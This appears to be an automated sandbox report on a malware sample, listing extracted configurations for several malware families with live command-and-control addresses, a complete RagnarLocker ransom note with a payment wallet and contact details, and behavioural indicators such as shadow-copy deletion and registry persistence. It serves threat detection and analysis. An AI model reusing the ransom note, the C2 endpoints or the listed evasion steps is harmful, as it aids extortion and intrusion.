amadey | d850d741582546a3d0ea2ad5d25e0766781f315cd37e6c58f7262df571cd0c40

Analysis

max time kernel
9s
max time network
36s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25-09-2024 22:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PCCooker_x64.exe
Size

22.4MB
MD5

317c5fe16b5314d1921930e300d9ea39
SHA1

65eb02c735bbbf1faf212662539fbf88a00a271f
SHA256

d850d741582546a3d0ea2ad5d25e0766781f315cd37e6c58f7262df571cd0c40
SHA512

31751379ad7f6c55d87e9a5c1f56e6211d515b7d9ae055af962ed6f9205f5abad302c2e47dd56325abff85327ec3b7f9a6cf76ed34b8cbe1da06549c622c7031
SSDEEP

49152:yIT4lj7Rl9HFoDi+3JK5CS2bV5IRtyrp63FDysl28Wvp/pUOmrscrdXuMIgqJ95+:yI6

Malware Config

Extracted

Family

marsstealer

Botnet

Default

Extracted

Family

xworm

Version

5.0

outside-sand.gl.at.ply.gg:31300

Mutex

uGoUQjcjqoZsiRJZ

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Extracted

Path

C:\Users\Public\Documents\RGNR_86266DD0.txt

Ransom Note

Hello VGCARGO ! ***************************************************************************************************************** If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED by RAGNAR_LOCKER ! ***************************************************************************************************************** *********What happens with your system ?************ Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US. You can google it, there is no CHANCES to decrypt data without our SECRET KEY. But don't worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY. We are looking only for MONEY, so there is no interest for us to steel or delete your information, it's just a BUSINESS $-) HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!! Also, all of your sensitive and private information were gathered and if you decide NOT to pay, we will upload it for public view ! **** ***********How to get back your files ?****** To decrypt all your files and data you have to pay for the encryption KEY : BTC wallet for payment: 1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4 Amount to pay (in Bitcoin): 25 **** ***********How much time you have to pay?********** * You should get in contact with us within 2 days after you noticed the encryption to get a better price. * The price would be increased by 100% (double price) after 14 Days if there is no contact made. * The key would be completely erased in 21 day if there is no contact made or no deal made. Some sensetive information stolen from the file servers would be uploaded in public or to re-seller. **** ***********What if files can't be restored ?****** To prove that we really can decrypt your data, we will decrypt one of your locked files ! Just send it to us and you will get it back FOR FREE. The price for the decryptor is based on the network size, number of employees, annual revenue. Please feel free to contact us for amount of BTC that should be paid. **** ! IF you don't know how to get bitcoins, we will give you advise how to exchange the money. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US ! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1) Go to the official website of TOX messenger ( https://tox.chat/download.html ) 2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. ) 3) Open messenger, click "New Profile" and create profile. 4) Click "Add friends" button and search our contact 7D509C5BB14B1B8CB0A3338EEA9707AD31075868CB9515B17C4C0EC6A0CCCA750CA81606900D 5) For identification, send to our support data from ---RAGNAR SECRET--- IMPORTANT ! IF for some reasons you CAN'T CONTACT us in qTOX, here is our reserve mailbox ( [email protected] ) send a message with a data from ---RAGNAR SECRET--- WARNING! -Do not try to decrypt files with any third-party software (it will be damaged permanently) -Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER! -Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME ! *********************************************************************************** ---RAGNAR SECRET--- QWZjY0QxRTk2MWU4RTIwYkVCRUNhRWMzRjhCQTdlZDJkNUJCN2JkNDdDMzREMTYyNjNGNTdiZGFDYmI3ZEVhNw== ---RAGNAR SECRET--- ***********************************************************************************

Emails

[email protected]

Wallets

1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4

URLs

https://tox.chat/download.html

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

save

http://185.215.113.37

Attributes

url_path
/e2b1563c6670f193.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Xworm Payload 50 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\25.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\24.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\22.exe	family_xworm
behavioral2/memory/2288-80-0x00000000001D0000-0x00000000001E0000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\20.exe	family_xworm
behavioral2/memory/348-78-0x0000000000F30000-0x0000000000F40000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\23.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\21.exe	family_xworm
behavioral2/memory/820-74-0x00000000010F0000-0x0000000001100000-memory.dmp	family_xworm
behavioral2/memory/1140-90-0x0000000000A70000-0x0000000000A80000-memory.dmp	family_xworm
behavioral2/memory/2144-89-0x0000000000B80000-0x0000000000B90000-memory.dmp	family_xworm
behavioral2/memory/824-88-0x0000000000840000-0x0000000000850000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\18.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\19.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\16.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\14.exe	family_xworm
behavioral2/memory/1172-122-0x0000000000090000-0x00000000000A0000-memory.dmp	family_xworm
behavioral2/memory/2256-123-0x00000000003D0000-0x00000000003E0000-memory.dmp	family_xworm
behavioral2/memory/776-117-0x00000000011D0000-0x00000000011E0000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\13.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\15.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\17.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\12.exe	family_xworm
behavioral2/memory/584-142-0x0000000001180000-0x0000000001190000-memory.dmp	family_xworm
behavioral2/memory/2700-141-0x0000000000DB0000-0x0000000000DC0000-memory.dmp	family_xworm
behavioral2/memory/2072-140-0x00000000013E0000-0x00000000013F0000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\8.exe	family_xworm
behavioral2/memory/656-156-0x0000000000B90000-0x0000000000BA0000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\11.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\10.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\7.exe	family_xworm
behavioral2/memory/3024-201-0x00000000003F0000-0x0000000000400000-memory.dmp	family_xworm
behavioral2/memory/1184-157-0x0000000000FF0000-0x0000000001000000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\6.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\9.exe	family_xworm
behavioral2/memory/2980-184-0x0000000000030000-0x0000000000040000-memory.dmp	family_xworm
behavioral2/memory/2988-210-0x0000000001040000-0x0000000001050000-memory.dmp	family_xworm
behavioral2/memory/3004-209-0x00000000000D0000-0x00000000000E0000-memory.dmp	family_xworm
behavioral2/memory/2900-211-0x0000000000CF0000-0x0000000000D00000-memory.dmp	family_xworm
behavioral2/memory/2876-220-0x0000000000C80000-0x0000000000C90000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\5.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\4.exe	family_xworm
behavioral2/memory/860-268-0x0000000000880000-0x0000000000890000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\3.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\2.exe	family_xworm
behavioral2/memory/2840-304-0x0000000001150000-0x0000000001160000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\1.exe	family_xworm
behavioral2/memory/1200-309-0x0000000001260000-0x0000000001270000-memory.dmp	family_xworm
behavioral2/memory/2584-308-0x0000000001120000-0x0000000001130000-memory.dmp	family_xworm
behavioral2/memory/1860-283-0x00000000008F0000-0x0000000000900000-memory.dmp	family_xworm

Mars Stealer
An infostealer written in C++ based on other infostealers.
stealer marsstealer

Phorphiex payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\t2.exe	family_phorphiex
C:\Users\Admin\AppData\Local\Temp\Files\a.exe	family_phorphiex
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RagnarLocker
Ransomware first seen at the end of 2019, which has been used in targetted attacks against multiple companies.
ransomware ragnarlocker
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (1690) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

3808 powershell.exe
8000 powershell.exe
4836 powershell.exe
5060 powershell.exe
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
3808	powershell.exe
8000	powershell.exe
4836	powershell.exe
5060	powershell.exe

Drops startup file 3 IoCs

Processes:

explorer.exefile1.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2fddd325.exe	explorer.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cLURD8fol333eHU23PMFaD0w.bat	file1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mLf4NWeyd7YmLEMakarq9y3z.bat	file1.exe

Executes dropped EXE 34 IoCs

Processes:

4363463463464363463463463.exeasena.exea76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exeBomb.exeCryptoWall.exe25.exe24.exe22.exe23.exe20.exe21.exe19.exe18.exe16.exe14.exe17.exe15.exe13.exe12.exe10.exe11.exe8.exe9.exe6.exe7.exe5.exe4.exe2.exe3.exe1.exet2.exefile1.exenn751smCfRqJS6L8DIVKWPBb.exesysklnorbcv.exe

pid	process
3032	4363463463464363463463463.exe
2516	asena.exe
3036	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
2712	Bomb.exe
2764	CryptoWall.exe
2288	25.exe
820	24.exe
348	22.exe
2144	23.exe
824	20.exe
1140	21.exe
776	19.exe
1172	18.exe
2256	16.exe
2072	14.exe
584	17.exe
656	15.exe
1184	13.exe
2700	12.exe
2980	10.exe
3024	11.exe
3004	8.exe
2900	9.exe
2988	6.exe
2876	7.exe
1860	5.exe
860	4.exe
2840	2.exe
1200	3.exe
2584	1.exe
3044	t2.exe
2004	file1.exe
3736	nn751smCfRqJS6L8DIVKWPBb.exe
3216	sysklnorbcv.exe

Indirect Command Execution 1 TTPs 6 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
defense_evasion

Indirect Command Execution
T1202

Processes:

forfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exe

pid process

3880 forfiles.exe
3516 forfiles.exe
4460 forfiles.exe
3788 forfiles.exe
4592 forfiles.exe
4480 forfiles.exe

pid	process
3880	forfiles.exe
3516	forfiles.exe
4460	forfiles.exe
3788	forfiles.exe
4592	forfiles.exe
4480	forfiles.exe

Loads dropped DLL 10 IoCs

Processes:

PCCooker_x64.exe4363463463464363463463463.exe

pid	process
2368	PCCooker_x64.exe
2368	PCCooker_x64.exe
2368	PCCooker_x64.exe
2368	PCCooker_x64.exe
2368	PCCooker_x64.exe
2368	PCCooker_x64.exe
2368	PCCooker_x64.exe
3032	4363463463464363463463463.exe
3032	4363463463464363463463463.exe
3032	4363463463464363463463463.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

t2.exeexplorer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe"	t2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\2fddd32 = "C:\\2fddd325\\2fddd325.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*fddd32 = "C:\\2fddd325\\2fddd325.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\2fddd325 = "C:\\Users\\Admin\\AppData\\Roaming\\2fddd325.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*fddd325 = "C:\\Users\\Admin\\AppData\\Roaming\\2fddd325.exe"	explorer.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

asena.exe

description ioc process

File opened (read-only) \??\E: asena.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

21 pastebin.com
22 pastebin.com
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-addr.es
7 myexternalip.com
32 ip-api.com
35 ip-api.com
36 ip-api.com
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

asena.exe

description ioc process

File opened for modification \??\PHYSICALDRIVE0 asena.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

5320 tasklist.exe
3968 tasklist.exe

description	ioc	process
File opened (read-only)	\??\E:	asena.exe

flow	ioc
21	pastebin.com
22	pastebin.com

flow	ioc
4	ip-addr.es
7	myexternalip.com
32	ip-api.com
35	ip-api.com
36	ip-api.com

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	asena.exe

pid	process
5320	tasklist.exe
3968	tasklist.exe

Drops file in Program Files directory 64 IoCs

Processes:

asena.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\TipBand.dll.mui	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar	asena.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\RGNR_86266DD0.txt	asena.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml	asena.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar	asena.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png	asena.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\RGNR_86266DD0.txt	asena.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\RGNR_86266DD0.txt	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\ShapeCollector.exe.mui	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\rtscom.dll.mui	asena.exe
File created	C:\Program Files\Common Files\System\RGNR_86266DD0.txt	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml	asena.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-image-mask.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar	asena.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif	asena.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\RGNR_86266DD0.txt	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwrcatsh.dat	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf	asena.exe
File opened for modification	C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar	asena.exe

Drops file in Windows directory 2 IoCs

Processes:

t2.exe

description ioc process

File created C:\Windows\sysklnorbcv.exe t2.exe
File opened for modification C:\Windows\sysklnorbcv.exe t2.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4964 sc.exe
4256 sc.exe
10164 sc.exe
10196 sc.exe
5648 sc.exe
3740 sc.exe
4580 sc.exe
4836 sc.exe
7912 sc.exe
6156 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\sysklnorbcv.exe	t2.exe
File opened for modification	C:\Windows\sysklnorbcv.exe	t2.exe

pid	process
4964	sc.exe
4256	sc.exe
10164	sc.exe
10196	sc.exe
5648	sc.exe
3740	sc.exe
4580	sc.exe
4836	sc.exe
7912	sc.exe
6156	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

CryptoWall.exeasena.exeexplorer.exesvchost.exevssadmin.exet2.exePCCooker_x64.exe4363463463464363463463463.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CryptoWall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	asena.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vssadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	t2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCCooker_x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe

Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exevssadmin.exe

pid process

620 vssadmin.exe
2228 vssadmin.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

8972 schtasks.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

CryptoWall.exeexplorer.exe

pid process

2764 CryptoWall.exe
2624 explorer.exe

pid	process
620	vssadmin.exe
2228	vssadmin.exe

pid	process
8972	schtasks.exe

pid	process
2764	CryptoWall.exe
2624	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exevssvc.exe4363463463464363463463463.exe22.exe24.exe20.exe25.exe23.exe21.exe19.exe18.exe16.exe14.exe12.exe15.exe13.exe17.exe10.exe11.exe8.exe6.exe9.exe7.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2892	wmic.exe
Token: SeSecurityPrivilege	2892	wmic.exe
Token: SeTakeOwnershipPrivilege	2892	wmic.exe
Token: SeLoadDriverPrivilege	2892	wmic.exe
Token: SeSystemProfilePrivilege	2892	wmic.exe
Token: SeSystemtimePrivilege	2892	wmic.exe
Token: SeProfSingleProcessPrivilege	2892	wmic.exe
Token: SeIncBasePriorityPrivilege	2892	wmic.exe
Token: SeCreatePagefilePrivilege	2892	wmic.exe
Token: SeBackupPrivilege	2892	wmic.exe
Token: SeRestorePrivilege	2892	wmic.exe
Token: SeShutdownPrivilege	2892	wmic.exe
Token: SeDebugPrivilege	2892	wmic.exe
Token: SeSystemEnvironmentPrivilege	2892	wmic.exe
Token: SeRemoteShutdownPrivilege	2892	wmic.exe
Token: SeUndockPrivilege	2892	wmic.exe
Token: SeManageVolumePrivilege	2892	wmic.exe
Token: 33	2892	wmic.exe
Token: 34	2892	wmic.exe
Token: 35	2892	wmic.exe
Token: SeIncreaseQuotaPrivilege	2892	wmic.exe
Token: SeSecurityPrivilege	2892	wmic.exe
Token: SeTakeOwnershipPrivilege	2892	wmic.exe
Token: SeLoadDriverPrivilege	2892	wmic.exe
Token: SeSystemProfilePrivilege	2892	wmic.exe
Token: SeSystemtimePrivilege	2892	wmic.exe
Token: SeProfSingleProcessPrivilege	2892	wmic.exe
Token: SeIncBasePriorityPrivilege	2892	wmic.exe
Token: SeCreatePagefilePrivilege	2892	wmic.exe
Token: SeBackupPrivilege	2892	wmic.exe
Token: SeRestorePrivilege	2892	wmic.exe
Token: SeShutdownPrivilege	2892	wmic.exe
Token: SeDebugPrivilege	2892	wmic.exe
Token: SeSystemEnvironmentPrivilege	2892	wmic.exe
Token: SeRemoteShutdownPrivilege	2892	wmic.exe
Token: SeUndockPrivilege	2892	wmic.exe
Token: SeManageVolumePrivilege	2892	wmic.exe
Token: 33	2892	wmic.exe
Token: 34	2892	wmic.exe
Token: 35	2892	wmic.exe
Token: SeBackupPrivilege	2632	vssvc.exe
Token: SeRestorePrivilege	2632	vssvc.exe
Token: SeAuditPrivilege	2632	vssvc.exe
Token: SeDebugPrivilege	3032	4363463463464363463463463.exe
Token: SeDebugPrivilege	348	22.exe
Token: SeDebugPrivilege	820	24.exe
Token: SeDebugPrivilege	824	20.exe
Token: SeDebugPrivilege	2288	25.exe
Token: SeDebugPrivilege	2144	23.exe
Token: SeDebugPrivilege	1140	21.exe
Token: SeDebugPrivilege	776	19.exe
Token: SeDebugPrivilege	1172	18.exe
Token: SeDebugPrivilege	2256	16.exe
Token: SeDebugPrivilege	2072	14.exe
Token: SeDebugPrivilege	2700	12.exe
Token: SeDebugPrivilege	656	15.exe
Token: SeDebugPrivilege	1184	13.exe
Token: SeDebugPrivilege	584	17.exe
Token: SeDebugPrivilege	2980	10.exe
Token: SeDebugPrivilege	3024	11.exe
Token: SeDebugPrivilege	3004	8.exe
Token: SeDebugPrivilege	2988	6.exe
Token: SeDebugPrivilege	2900	9.exe
Token: SeDebugPrivilege	2876	7.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

PCCooker_x64.exeCryptoWall.exeasena.exeexplorer.exeBomb.exe

description	pid	process	target process
PID 2368 wrote to memory of 3032	2368	PCCooker_x64.exe	4363463463464363463463463.exe
